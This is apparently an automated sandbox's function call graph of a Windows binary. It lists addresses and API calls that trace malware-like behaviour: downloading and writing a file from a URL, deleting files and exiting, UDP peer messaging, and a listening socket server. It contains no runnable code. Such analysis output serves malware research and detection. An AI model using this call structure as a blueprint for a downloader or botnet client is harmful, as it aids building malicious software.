_invalid_parameter 4745->4746 4747 4040b8 _invalid_parameter 4746->4747 4748 4040dd 4746->4748 4750 404103 4746->4750 4747->4740 4775 403ca0 4748->4775 4751 40413d 4750->4751 4752 40415e 4750->4752 4785 404680 4751->4785 4754 402820 _invalid_parameter 7 API calls 4752->4754 4755 40416f 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40417e 4756->4757 4758 402820 _invalid_parameter 7 API calls 4757->4758 4759 40418d 4758->4759 4760 402820 _invalid_parameter 7 API calls 4759->4760 4761 40419c 4760->4761 4798 403d70 4761->4798 4763 402820 _invalid_parameter 7 API calls 4764 4041ca _invalid_parameter 4763->4764 4764->4763 4766 404284 _invalid_parameter __aligned_recalloc_base 4764->4766 4765 402850 _invalid_parameter 3 API calls 4765->4766 4766->4765 4767 4045a3 _invalid_parameter 4766->4767 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 4045c9 _invalid_parameter 4767->4769 4768->4767 4770 402850 _invalid_parameter 3 API calls 4769->4770 4771 4045ef _invalid_parameter 4769->4771 4770->4769 4772 402850 _invalid_parameter 3 API calls 4771->4772 4773 404615 _invalid_parameter 4771->4773 4772->4771 4773->4747 4774 402850 _invalid_parameter 3 API calls 4773->4774 4774->4773 4776 403cae 4775->4776 4777 402820 _invalid_parameter 7 API calls 4776->4777 4778 403ccb 4777->4778 4779 402820 _invalid_parameter 7 API calls 4778->4779 4780 403cda _invalid_parameter 4779->4780 4781 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4780->4781 4782 403d3a _invalid_parameter 4780->4782 4781->4780 4783 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4782->4783 4784 403d60 4782->4784 4783->4782 4784->4747 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 404697 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4789 4046a6 4788->4789 4790 402820 _invalid_parameter 7 API calls 4789->4790 4791 4046b5 _invalid_parameter __aligned_recalloc_base 4790->4791 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4791->4792 4794 404841 _invalid_parameter 4791->4794 4792->4791 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4793->4794 4794->4793 4795 404867 _invalid_parameter 4794->4795 4796 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4795->4796 4797 40488d 4795->4797 4796->4795 4797->4747 4799 402820 _invalid_parameter 7 API calls 4798->4799 4800 403d7f _invalid_parameter 4799->4800 4801 403ca0 _invalid_parameter 9 API calls 4800->4801 4802 403db8 _invalid_parameter 4801->4802 4803 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4802->4803 4804 403de3 4802->4804 4803->4802 4804->4764 4806 409d22 4805->4806 4809 409c70 4806->4809 4810 409fa0 __aligned_recalloc_base 7 API calls 4809->4810 4811 409c80 4810->4811 4813 409cbc 4811->4813 4816 407b0f 4811->4816 4818 4091a0 4811->4818 4825 409790 4811->4825 4830 409b60 4811->4830 4815 40a1b0 __aligned_recalloc_base 3 API calls 4813->4815 4815->4816 4816->4668 4819 4091a9 4818->4819 4820 4091b3 4818->4820 4819->4811 4820->4819 4821 4091f6 memset 4820->4821 4821->4819 4822 409217 4821->4822 4822->4819 4823 40921d memcpy 4822->4823 4838 408f70 4823->4838 4826 40979d 4825->4826 4827 4097a7 4825->4827 4826->4811 4827->4826 4828 40989f memcpy 4827->4828 4843 4094c0 4827->4843 4828->4827 4831 409b6c 4830->4831 4833 409b76 4830->4833 4831->4811 4832 4094c0 64 API calls 4834 409bf7 4832->4834 4833->4831 4833->4832 4834->4831 4835 408f70 6 API calls 4834->4835 4836 409c16 4835->4836 4836->4831 4837 409c2b memcpy 4836->4837 4837->4831 4839 408fbe 4838->4839 4840 408f7e 4838->4840 4839->4819 4840->4839 4842 408eb0 6 API calls 4840->4842 4842->4840 4844 4094da 4843->4844 4847 4094d0 4843->4847 4844->4847 4853 409300 4844->4853 4847->4827 4848 409618 memcpy 4848->4847 4850 409637 memcpy 4851 409761 4850->4851 4852 4094c0 62 API calls 4851->4852 4852->4847 4854 40930d 4853->4854 4855 409317 4853->4855 4854->4847 4854->4848 4854->4850 4855->4854 4856 4093a0 4855->4856 4857 4093a5 4855->4857 4858 409388 4855->4858 4864 408c60 4856->4864 4861 408f70 6 API calls 4857->4861 4860 408f70 6 API calls 4858->4860 4860->4856 4861->4856 4863 40944c memset 4863->4854 4865 408c79 4864->4865 4873 408c6f 4864->4873 4866 408b30 9 API calls 4865->4866 4865->4873 4867 408d72 4866->4867 4868 409fa0 __aligned_recalloc_base 7 API calls 4867->4868 4869 408dc1 4868->4869 4870 4089a0 46 API calls 4869->4870 4869->4873 4871 408dee 4870->4871 4872 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4871->4872 4872->4873 4873->4854 4873->4863 4893 409e50 GetCurrentProcessId 4874->4893 4876 409feb 4877 409e70 __aligned_recalloc_base 5 API calls 4876->4877 4878 409ff7 __aligned_recalloc_base 4876->4878 4877->4878 4879 40a0f0 __aligned_recalloc_base HeapValidate 4878->4879 4880 40a0a0 HeapAlloc 4878->4880 4881 40a06a HeapReAlloc 4878->4881 4882 40a1b0 __aligned_recalloc_base 3 API calls 4878->4882 4883 405d15 4878->4883 4879->4878 4880->4878 4881->4878 4882->4878 4883->4654 4883->4655 4887 40c19b 4884->4887 4885 409fa0 __aligned_recalloc_base 7 API calls 4885->4887 4886 405dad 4886->4655 4888 407310 4886->4888 4887->4885 4887->4886 4889 409fa0 __aligned_recalloc_base 7 API calls 4888->4889 4890 407320 4889->4890 4891 407367 4890->4891 4892 40732c memcpy CreateThread 4890->4892 4891->4655 4892->4891 4894 407370 GetTickCount srand rand Sleep 4892->4894 4893->4876 4895 4073a7 4894->4895 4896 4073fd 4894->4896 4897 4073fb 4895->4897 4900 4073b6 StrChrA 4895->4900 4896->4897 4898 40eae0 56 API calls 4896->4898 4899 40a1b0 __aligned_recalloc_base 3 API calls 4897->4899 4898->4897 4901 407428 4899->4901 4902 4073cb 4900->4902 4905 40eae0 9 API calls 4902->4905 4906 40ed03 InternetCloseHandle Sleep 4905->4906 4907 40eba3 InternetOpenUrlW 4905->4907 4908 4073e5 Sleep 4906->4908 4909 40ed2a 6 API calls 4906->4909 4910 40ebd2 CreateFileW 4907->4910 4911 40ecf6 InternetCloseHandle 4907->4911 4908->4895 4909->4908 4912 40eda6 wsprintfW DeleteFileW 4909->4912 4913 40ec01 InternetReadFile 4910->4913 4914 40ecd3 4910->4914 4911->4906 4915 40e7c0 18 API calls 4912->4915 4916 40ec54 wsprintfW DeleteFileW 4913->4916 4917 40ec25 4913->4917 4914->4911 4919 40eddb 4915->4919 4933 40e7c0 CreateFileW 4916->4933 4917->4916 4918 40ec2e WriteFile 4917->4918 4918->4913 4921 40ede5 Sleep 4919->4921 4922 40ee19 DeleteFileW 4919->4922 4924 40e980 6 API calls 4921->4924 4922->4908 4926 40edfc 4924->4926 4926->4908 4930 40ee0f ExitProcess 4926->4930 4927 40eca0 Sleep 4929 40e980 6 API calls 4927->4929 4928 40ecdc DeleteFileW 4928->4914 4931 40ecb7 4929->4931 4931->4914 4932 40eccb ExitProcess 4931->4932 4934 40e805 CreateFileMappingW 4933->4934 4938 40e906 4933->4938 4935 40e826 MapViewOfFile 4934->4935 4934->4938 4937 40e845 GetFileSize 4935->4937 4935->4938 4936 40e920 CreateFileW 4939 40e942 WriteFile 4936->4939 4940 40e968 4936->4940 4942 40e861 4937->4942 4943 40e8fc UnmapViewOfFile 4937->4943 4938->4936 4944 40e971 4938->4944 4939->4940 4941 40a1b0 __aligned_recalloc_base 3 API calls 4940->4941 4941->4944 4953 40c7f0 4942->4953 4943->4938 4944->4927 4944->4928 4947 40c190 7 API calls 4948 40e8b0 4947->4948 4948->4943 4949 40e8cd memcmp 4948->4949 4949->4943 4950 40e8e9 4949->4950 4951 40a1b0 __aligned_recalloc_base 3 API calls 4950->4951 4952 40e8f2 4951->4952 4952->4943 4954 40c220 10 API calls 4953->4954 4955 40c814 4954->4955 4955->4943 4955->4947 4957 40d73d htons inet_addr setsockopt 4956->4957 4962 40d86e 4956->4962 4958 40aa80 8 API calls 4957->4958 4959 40d7b6 bind lstrlenA sendto ioctlsocket 4958->4959 4965 40d80b 4959->4965 4962->4436 4963 40d832 5013 40ab40 shutdown closesocket 4963->5013 4964 409fe0 9 API calls 4964->4965 4965->4963 4965->4964 5004 40d890 4965->5004 5020 40dbc0 memset InternetCrackUrlA InternetOpenA 4966->5020 4969 40da9e 4969->4436 4971 40a1b0 __aligned_recalloc_base 3 API calls 4971->4969 4975 40da6b 4975->4971 4977 40da61 SysFreeString 4977->4975 5127 40aa40 inet_addr 4981->5127 4984 40aadc connect 4985 40aaf0 getsockname 4984->4985 4986 40ab24 4984->4986 4985->4986 5130 40ab40 shutdown closesocket 4986->5130 4988 40ab2d 4989 40e470 4988->4989 5131 40aa20 inet_ntoa 4989->5131 4991 40e486 4992 40c9f0 11 API calls 4991->4992 4993 40e4a5 4992->4993 4994 40d6cc 4993->4994 5132 40e4f0 memset InternetCrackUrlA InternetOpenA 4993->5132 4994->4441 4997 40e4dc 4999 40a1b0 __aligned_recalloc_base 3 API calls 4997->4999 4998 40a1b0 __aligned_recalloc_base 3 API calls 4998->4997 4999->4994 5003 40a2d4 5000->5003 5001 40a2da 5001->4431 5002 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5002->5003 5003->5001 5003->5002 5009 40d8ac 5004->5009 5005 40d974 5005->4965 5006 40d8c8 recvfrom 5007 40d8f6 StrCmpNIA 5006->5007 5008 40d8e9 Sleep 5006->5008 5007->5009 5010 40d915 StrStrIA 5007->5010 5008->5009 5009->5005 5009->5006 5010->5009 5011 40d936 StrChrA 5010->5011 5014 40c8a0 5011->5014 5013->4962 5018 40c8ab 5014->5018 5015 40c8b1 lstrlenA 5017 40c8c4 5015->5017 5015->5018 5016 409fa0 __aligned_recalloc_base 7 API calls 5016->5018 5017->5009 5018->5015 5018->5016 5018->5017 5019 40c8e0 memcpy 5018->5019 5019->5017 5019->5018 5021 40dc61 InternetConnectA 5020->5021 5022 40d99a 5020->5022 5023 40ddca InternetCloseHandle 5021->5023 5024 40dc9a HttpOpenRequestA 5021->5024 5022->4969 5033 40dab0 5022->5033 5023->5022 5025 40dcd0 HttpSendRequestA 5024->5025 5026 40ddbd InternetCloseHandle 5024->5026 5027 40ddb0 InternetCloseHandle 5025->5027 5029 40dced 5025->5029 5026->5023 5027->5026 5028 40dd0e InternetReadFile 5028->5029 5030 40dd3b 5028->5030 5029->5028 5029->5030 5031 409fe0 9 API calls 5029->5031 5030->5027 5032 40dd56 memcpy 5031->5032 5032->5029 5062 405690 5033->5062 5036 40d9b3 5036->4975 5043 40e420 5036->5043 5037 40dada SysAllocString 5038 40daf1 CoCreateInstance 5037->5038 5039 40dba7 5037->5039 5040 40db9d SysFreeString 5038->5040 5042 40db16 5038->5042 5041 40a1b0 __aligned_recalloc_base 3 API calls 5039->5041 5040->5039 5041->5036 5042->5040 5079 40df70 5043->5079 5046 40ddf0 5084 40e240 5046->5084 5051 40e3a0 6 API calls 5052 40de47 5051->5052 5058 40da32 5052->5058 5101 40e060 5052->5101 5055 40de7f 5055->5058 5106 40df10 5055->5106 5056 40e060 6 API calls 5056->5055 5058->4977 5059 40c9f0 5058->5059 5122 40c960 5059->5122 5067 40569d 5062->5067 5063 4056a3 lstrlenA 5063->5067 5068 4056b6 5063->5068 5065 409fa0 __aligned_recalloc_base 7 API calls 5065->5067 5067->5063 5067->5065 5067->5068 5069 40a1b0 __aligned_recalloc_base 3 API calls 5067->5069 5070 405630 5067->5070 5074 4055e0 5067->5074 5068->5036 5068->5037 5069->5067 5071 405647 MultiByteToWideChar 5070->5071 5072 40563a lstrlenA 5070->5072 5073 40566c 5071->5073 5072->5071 5073->5067 5075 4055eb 5074->5075 5076 4055f1 lstrlenA 5075->5076 5077 405630 2 API calls 5075->5077 5078 405627 5075->5078 5076->5075 5077->5075 5078->5067 5082 40df96 5079->5082 5080 40da1d 5080->4975 5080->5046 5081 40e013 lstrcmpiW 5081->5082 5083 40e02b SysFreeString 5081->5083 5082->5080 5082->5081 5082->5083 5083->5082 5086 40e266 5084->5086 5085 40de0b 5085->5058 5096 40e3a0 5085->5096 5086->5085 5087 40e2f3 lstrcmpiW 5086->5087 5088 40e373 SysFreeString 5087->5088 5089 40e306 5087->5089 5088->5085 5090 40df10 2 API calls 5089->5090 5092 40e314 5090->5092 5091 40e365 5091->5088 5092->5088 5092->5091 5093 40e343 lstrcmpiW 5092->5093 5094 40e355 5093->5094 5095 40e35b SysFreeString 5093->5095 5094->5095 5095->5091 5097 40df10 2 API calls 5096->5097 5098 40e3bb 5097->5098 5099 40e240 6 API calls 5098->5099 5100 40de29 5098->5100 5099->5100 5100->5051 5100->5058 5102 40df10 2 API calls 5101->5102 5104 40e07b 5102->5104 5103 40de65 5103->5055 5103->5056 5104->5103 5110 40e0e0 5104->5110 5107 40df36 5106->5107 5108 40df70 2 API calls 5107->5108 5109 40df4d 5107->5109 5108->5109 5109->5058 5112 40e106 5110->5112 5111 40e21d 5111->5103 5112->5111 5113 40e193 lstrcmpiW 5112->5113 5114 40e213 SysFreeString 5113->5114 5115 40e1a6 5113->5115 5114->5111 5116 40df10 2 API calls 5115->5116 5118 40e1b4 5116->5118 5117 40e205 5117->5114 5118->5114 5118->5117 5119 40e1e3 lstrcmpiW 5118->5119 5120 40e1f5 5119->5120 5121 40e1fb SysFreeString 5119->5121 5120->5121 5121->5117 5123 40c96d 5122->5123 5124 409fe0 9 API calls 5123->5124 5125 40c910 _vscprintf wvsprintfA 5123->5125 5126 40c988 SysFreeString 5123->5126 5124->5123 5125->5123 5126->4977 5128 40aa6c socket 5127->5128 5129 40aa59 gethostbyname 5127->5129 5128->4984 5128->4988 5129->5128 5130->4988 5131->4991 5133 40e4c7 5132->5133 5134 40e594 InternetConnectA 5132->5134 5133->4997 5133->4998 5135 40e714 InternetCloseHandle 5134->5135 5136 40e5cd HttpOpenRequestA 5134->5136 5135->5133 5137 40e603 HttpAddRequestHeadersA HttpSendRequestA 5136->5137 5138 40e707 InternetCloseHandle 5136->5138 5139 40e6fa InternetCloseHandle 5137->5139 5142 40e64d 5137->5142 5138->5135 5139->5138 5140 40e664 InternetReadFile 5141 40e691 5140->5141 5140->5142 5141->5139 5142->5140 5142->5141 5143 409fe0 9 API calls 5142->5143 5144 40e6ac memcpy 5143->5144 5144->5142 5151 407067 5145->5151 5146 4072c0 CoCreateInstance 5146->5151 5147 40723b 5149 407244 SysFreeString 5147->5149 5150 40700b SysFreeString 5147->5150 5148 40a1b0 __aligned_recalloc_base 3 API calls 5148->5147 5149->5150 5150->4444 5151->5146 5152 4071b6 SysAllocString 5151->5152 5153 407082 5151->5153 5152->5151 5152->5153 5153->5147 5153->5148 5155 40beca 5154->5155 5156 40bece 5154->5156 5155->4450 5158 40be80 CryptAcquireContextW 5156->5158 5159 40bebb 5158->5159 5160 40be9d CryptGenRandom CryptReleaseContext 5158->5160 5159->5155 5160->5159 5161->4463 5213 40add0 gethostname 5162->5213 5165 40aeb9 5165->4463 5167 40aecc strcmp 5167->5165 5168 40aee1 5167->5168 5217 40aa20 inet_ntoa 5168->5217 5170 40aeef strstr 5171 40af40 5170->5171 5172 40aeff 5170->5172 5218 40aa20 inet_ntoa 5171->5218 5230 40aa20 inet_ntoa 5172->5230 5175 40af0d strstr 5175->5165 5177 40af1d 5175->5177 5176 40af4e strstr 5178 40af5e 5176->5178 5179 40af9f 5176->5179 5231 40aa20 inet_ntoa 5177->5231 5232 40aa20 inet_ntoa 5178->5232 5219 40aa20 inet_ntoa 5179->5219 5183 40af6c strstr 5183->5165 5186 40af7c 5183->5186 5184 40afad strstr 5187 40afbd 5184->5187 5188 40affe EnterCriticalSection 5184->5188 5185 40af2b strstr 5185->5165 5185->5171 5233 40aa20 inet_ntoa 5186->5233 5234 40aa20 inet_ntoa 5187->5234 5189 40b016 5188->5189 5198 40b041 5189->5198 5236 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5189->5236 5192 40af8a strstr 5192->5165 5192->5179 5193 40afcb strstr 5193->5165 5194 40afdb 5193->5194 5235 40aa20 inet_ntoa 5194->5235 5197 40b13a LeaveCriticalSection 5197->5165 5198->5197 5200 409d90 7 API calls 5198->5200 5199 40afe9 strstr 5199->5165 5199->5188 5201 40b085 5200->5201 5201->5197 5220 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5201->5220 5203 40b0a3 5204 40b0d0 5203->5204 5205 40b0c6 Sleep 5203->5205 5207 40b0f5 5203->5207 5206 40a1b0 __aligned_recalloc_base 3 API calls 5204->5206 5205->5203 5206->5207 5207->5197 5221 40ab80 5207->5221 5210 40ab80 13 API calls 5209->5210 5211 40ab73 LeaveCriticalSection 5210->5211 5211->4471 5212->4476 5214 40adf7 gethostbyname 5213->5214 5215 40ae13 5213->5215 5214->5215 5215->5165 5216 40aa20 inet_ntoa 5215->5216 5216->5167 5217->5170 5218->5176 5219->5184 5220->5203 5222 40ab94 5221->5222 5229 40ab8f 5221->5229 5223 409fa0 __aligned_recalloc_base 7 API calls 5222->5223 5225 40aba8 5223->5225 5224 40ac04 CreateFileW 5226 40ac53 InterlockedExchange 5224->5226 5227 40ac27 WriteFile FlushFileBuffers 5224->5227 5225->5224 5225->5229 5228 40a1b0 __aligned_recalloc_base 3 API calls 5226->5228 5227->5226 5228->5229 5229->5197 5230->5175 5231->5185 5232->5183 5233->5192 5234->5193 5235->5199 5236->5198 5240 40d25d 5237->5240 5238 40d193 5238->4483 5238->4484 5239 40d281 WaitForSingleObject 5239->5240 5240->5238 5240->5239 5306 4013b0 5241->5306 5243 40d55d 5245 40d577 InterlockedExchangeAdd 5243->5245 5246 40d5bb WaitForSingleObject 5243->5246 5250 40d5dd 5243->5250 5318 40b200 EnterCriticalSection 5243->5318 5323 40b520 5243->5323 5245->5243 5245->5246 5246->5243 5247 40d5d4 5246->5247 5326 401330 5247->5326 5252 401f92 5251->5252 5253 402008 5251->5253 5254 401f97 WSAGetOverlappedResult 5252->5254 5405 401d60 5252->5405 5254->5252 5255 401fb9 WSAGetLastError 5254->5255 5255->5252 5257 401fd3 GetQueuedCompletionStatus 5257->5252 5257->5253 5446 401470 5258->5446 5260 40d604 5261 40d62f 5260->5261 5262 40d615 WaitForSingleObject 5260->5262 5263 401330 7 API calls 5262->5263 5263->5261 5460 4021b0 5264->5460 5267 40cf42 5268 40cf25 WaitForSingleObject 5464 401600 5268->5464 5272 40b423 WaitForSingleObject 5271->5272 5273 40b451 5272->5273 5274 40b43b InterlockedDecrement 5272->5274 5275 40b44a 5274->5275 5275->5272 5276 40ab60 15 API calls 5275->5276 5276->5275 5278 401ac9 5277->5278 5279 40194d WSAWaitForMultipleEvents 5277->5279 5280 4019f0 GetTickCount 5279->5280 5281 40196a WSAEnumNetworkEvents 5279->5281 5282 401a43 GetTickCount 5280->5282 5283 401a05 EnterCriticalSection 5280->5283 5281->5280 5297 401983 5281->5297 5284 401ab5 WaitForSingleObject 5282->5284 5285 401a4e EnterCriticalSection 5282->5285 5286 401a3a LeaveCriticalSection 5283->5286 5290 401a16 5283->5290 5284->5278 5284->5279 5288 401aa1 LeaveCriticalSection GetTickCount 5285->5288 5289 401a5f InterlockedExchangeAdd 5285->5289 5286->5284 5287 401992 accept 5287->5280 5287->5297 5288->5284 5546 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5289->5546 5293 401a29 LeaveCriticalSection 5290->5293 5528 401820 5290->5528 5293->5284 5295 401a72 5295->5288 5295->5289 5547 40ab40 shutdown closesocket 5295->5547 5297->5280 5297->5287 5298 4019e9 5297->5298 5508 4022c0 5297->5508 5299 401cf0 7 API calls 5298->5299 5299->5280 5303 40ceb4 5300->5303 5301 40b200 5 API calls 5301->5303 5302 40ced0 WaitForSingleObject 5302->5303 5305 40cef5 5302->5305 5303->5301 5303->5302 5303->5305 5561 40cad0 InterlockedExchangeAdd 5303->5561 5307 409d90 7 API calls 5306->5307 5308 4013bb CreateEventA socket 5307->5308 5309 4013f2 5308->5309 5315 4013f8 5308->5315 5312 401330 7 API calls 5309->5312 5310 401401 bind 5313 401444 CreateThread 5310->5313 5314 401434 5310->5314 5311 401462 5311->5243 5312->5315 5313->5311 5336 401100 5313->5336 5316 401330 7 API calls 5314->5316 5315->5310 5315->5311 5317 40143a 5316->5317 5317->5243 5319 40b237 LeaveCriticalSection 5318->5319 5320 40b21f 5318->5320 5319->5243 5321 40bec0 3 API calls 5320->5321 5322 40b22a 5321->5322 5322->5319 5365 40b480 5323->5365 5327 401339 5326->5327 5333 40139b 5326->5333 5328 401341 SetEvent WaitForSingleObject 5327->5328 5327->5333 5329 401362 5328->5329 5334 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5329->5334 5335 40138b 5329->5335 5331 401395 5332 40a1b0 __aligned_recalloc_base 3 API calls 5331->5332 5332->5333 5333->5250 5334->5329 5404 40ab40 shutdown closesocket 5335->5404 5337 401115 ioctlsocket 5336->5337 5338 4011e4 5337->5338 5343 40113a 5337->5343 5339 40a1b0 __aligned_recalloc_base 3 API calls 5338->5339 5341 4011ea 5339->5341 5340 4011cd WaitForSingleObject 5340->5337 5340->5338 5342 409fe0 9 API calls 5342->5343 5343->5340 5343->5342 5344 401168 recvfrom 5343->5344 5345 4011ad InterlockedExchangeAdd 5343->5345 5344->5340 5344->5343 5347 401000 5345->5347 5348 401014 5347->5348 5349 40103b 5348->5349 5350 409d90 7 API calls 5348->5350 5358 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5349->5358 5350->5349 5352 40105b 5359 401580 5352->5359 5354 4010ec 5354->5343 5355 4010a3 IsBadReadPtr 5357 401071 5355->5357 5356 4010d8 memmove 5356->5357 5357->5354 5357->5355 5357->5356 5358->5352 5360 401592 5359->5360 5361 4015a5 memcpy 5359->5361 5362 409fe0 9 API calls 5360->5362 5364 4015c1 5361->5364 5363 40159f 5362->5363 5363->5361 5364->5357 5366 40bf00 3 API calls 5365->5366 5367 40b48b 5366->5367 5368 40b4a7 lstrlenA 5367->5368 5369 40c190 7 API calls 5368->5369 5370 40b4dd 5369->5370 5371 40b508 5370->5371 5376 40d520 5370->5376 5379 40cc30 5370->5379 5371->5243 5372 40b4fc 5373 40a1b0 __aligned_recalloc_base 3 API calls 5372->5373 5373->5371 5384 401200 5376->5384 5378 40d542 5378->5372 5400 40cc90 5379->5400 5382 40cc5e 5382->5372 5383 40cc90 send 5383->5382 5385 401314 5384->5385 5386 40121d 5384->5386 5385->5378 5386->5385 5387 409fa0 __aligned_recalloc_base 7 API calls 5386->5387 5388 401247 memcpy htons 5387->5388 5389 4012ed 5388->5389 5390 401297 sendto 5388->5390 5393 40a1b0 __aligned_recalloc_base 3 API calls 5389->5393 5391 4012b6 InterlockedExchangeAdd 5390->5391 5392 4012e9 5390->5392 5391->5390 5394 4012cc 5391->5394 5392->5389 5395 40130a 5392->5395 5396 4012fc 5393->5396 5398 40a1b0 __aligned_recalloc_base 3 API calls 5394->5398 5397 40a1b0 __aligned_recalloc_base 3 API calls 5395->5397 5396->5378 5397->5385 5399 4012db 5398->5399 5399->5378 5401 40cca1 send 5400->5401 5402 40cc43 5401->5402 5403 40ccbe 5401->5403 5402->5382 5402->5383 5403->5401 5403->5402 5404->5331 5406 401ef2 InterlockedDecrement setsockopt closesocket 5405->5406 5407 401d74 5405->5407 5424 401e39 5406->5424 5407->5406 5408 401d7c 5407->5408 5425 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5425 5410 401d81 InterlockedExchange 5411 401d98 5410->5411 5412 401e4e 5410->5412 5417 401da9 InterlockedDecrement 5411->5417 5418 401dbc InterlockedDecrement InterlockedExchangeAdd 5411->5418 5411->5424 5413 401e67 5412->5413 5414 401e57 InterlockedDecrement 5412->5414 5415 401e72 5413->5415 5416 401e87 InterlockedDecrement 5413->5416 5414->5257 5434 401ae0 WSASend 5415->5434 5422 401ee9 5416->5422 5417->5257 5420 401e2f 5418->5420 5426 401cf0 5420->5426 5421 401e7e 5421->5257 5422->5257 5424->5257 5425->5410 5427 401d00 InterlockedExchangeAdd 5426->5427 5428 401cfc 5426->5428 5429 401d53 5427->5429 5430 401d17 InterlockedIncrement 5427->5430 5428->5424 5429->5424 5440 401c50 WSARecv 5430->5440 5432 401d46 5432->5429 5433 401d4c InterlockedDecrement 5432->5433 5433->5429 5435 401b50 5434->5435 5436 401b12 WSAGetLastError 5434->5436 5435->5421 5436->5435 5437 401b1f 5436->5437 5438 401b56 5437->5438 5439 401b26 Sleep WSASend 5437->5439 5438->5421 5439->5435 5439->5436 5441 401cd2 5440->5441 5442 401c8e 5440->5442 5441->5432 5443 401c90 WSAGetLastError 5442->5443 5444 401ca4 Sleep WSARecv 5442->5444 5445 401cdb 5442->5445 5443->5441 5443->5442 5444->5441 5444->5443 5445->5432 5447 401483 5446->5447 5448 401572 5446->5448 5447->5448 5449 409d90 7 API calls 5447->5449 5448->5260 5450 401498 CreateEventA socket 5449->5450 5451 4014cf 5450->5451 5456 4014d5 5450->5456 5453 401330 7 API calls 5451->5453 5452 4014e2 htons setsockopt bind 5454 401546 5452->5454 5455 401558 CreateThread 5452->5455 5453->5456 5457 401330 7 API calls 5454->5457 5455->5448 5459 401100 20 API calls __aligned_recalloc_base 5455->5459 5456->5448 5456->5452 5458 40154c 5457->5458 5458->5260 5461 4021cf 5460->5461 5462 4021bb 5460->5462 5461->5267 5461->5268 5462->5461 5485 402020 5462->5485 5465 40160d 5464->5465 5484 401737 5464->5484 5466 401619 EnterCriticalSection 5465->5466 5465->5484 5467 4016b5 LeaveCriticalSection SetEvent 5466->5467 5470 401630 5466->5470 5468 4016d0 5467->5468 5469 4016e8 5467->5469 5471 4016d6 PostQueuedCompletionStatus 5468->5471 5472 40d2d0 11 API calls 5469->5472 5470->5467 5473 401641 InterlockedDecrement 5470->5473 5475 40165a InterlockedExchangeAdd 5470->5475 5481 4016a0 InterlockedDecrement 5470->5481 5471->5469 5471->5471 5474 4016f3 5472->5474 5473->5470 5476 40d410 6 API calls 5474->5476 5475->5470 5477 40166d InterlockedIncrement 5475->5477 5478 4016fc CloseHandle CloseHandle WSACloseEvent 5476->5478 5479 401c50 4 API calls 5477->5479 5507 40ab40 shutdown closesocket 5478->5507 5479->5470 5481->5470 5482 401724 DeleteCriticalSection 5483 40a1b0 __aligned_recalloc_base 3 API calls 5482->5483 5483->5484 5484->5267 5486 409d90 7 API calls 5485->5486 5487 40202b 5486->5487 5488 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5487->5488 5489 4021aa 5487->5489 5490 402076 CreateIoCompletionPort 5488->5490 5491 40219f 5488->5491 5489->5461 5490->5491 5492 40208f 5490->5492 5493 401600 35 API calls 5491->5493 5494 40d130 8 API calls 5492->5494 5495 4021a5 5493->5495 5496 402094 5494->5496 5495->5489 5496->5491 5497 40209f WSASocketA 5496->5497 5497->5491 5498 4020bd setsockopt htons bind 5497->5498 5498->5491 5499 402126 listen 5498->5499 5499->5491 5500 40213a WSACreateEvent 5499->5500 5500->5491 5501 402147 WSAEventSelect 5500->5501 5501->5491 5502 402159 5501->5502 5503 40217f 5502->5503 5504 40d160 317 API calls 5502->5504 5505 40d160 317 API calls 5503->5505 5504->5502 5506 402194 5505->5506 5506->5461 5507->5482 5509 4022d2 EnterCriticalSection 5508->5509 5510 4022cd 5508->5510 5511 4022fd LeaveCriticalSection 5509->5511 5512 4022e7 5509->5512 5510->5297 5513 402308 5511->5513 5514 40230f 5511->5514 5512->5511 5513->5297 5515 409d90 7 API calls 5514->5515 5516 402319 5515->5516 5517 402326 getpeername CreateIoCompletionPort 5516->5517 5518 4023b8 5516->5518 5519 4023b2 5517->5519 5520 402366 5517->5520 5550 40ab40 shutdown closesocket 5518->5550 5523 40a1b0 __aligned_recalloc_base 3 API calls 5519->5523 5548 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5520->5548 5523->5518 5524 4023c3 5524->5297 5525 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5549 4021e0 EnterCriticalSection LeaveCriticalSection 5525->5549 5527 4023ab 5527->5297 5529 401830 5528->5529 5537 40190f 5528->5537 5530 40183d InterlockedExchangeAdd 5529->5530 5529->5537 5531 401854 5530->5531 5530->5537 5532 401880 5531->5532 5531->5537 5551 4017a0 EnterCriticalSection 5531->5551 5533 401891 5532->5533 5560 40ab40 shutdown closesocket 5532->5560 5536 4018a7 InterlockedDecrement 5533->5536 5538 401901 5533->5538 5536->5538 5537->5286 5539 402247 5538->5539 5540 402265 EnterCriticalSection 5538->5540 5539->5286 5541 40229c LeaveCriticalSection DeleteCriticalSection 5540->5541 5544 40227d 5540->5544 5542 40a1b0 __aligned_recalloc_base 3 API calls 5541->5542 5542->5539 5543 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5543->5544 5544->5543 5545 40229b 5544->5545 5545->5541 5546->5295 5547->5295 5548->5525 5549->5527 5550->5524 5552 401807 LeaveCriticalSection 5551->5552 5553 4017ba InterlockedExchangeAdd 5551->5553 5552->5531 5554 4017ca LeaveCriticalSection 5553->5554 5555 4017d9 5553->5555 5554->5531 5556 40a1b0 __aligned_recalloc_base 3 API calls 5555->5556 5557 4017fe 5556->5557 5558 40a1b0 __aligned_recalloc_base 3 API calls 5557->5558 5559 401804 5558->5559 5559->5552 5560->5533 5562 40caed 5561->5562 5573 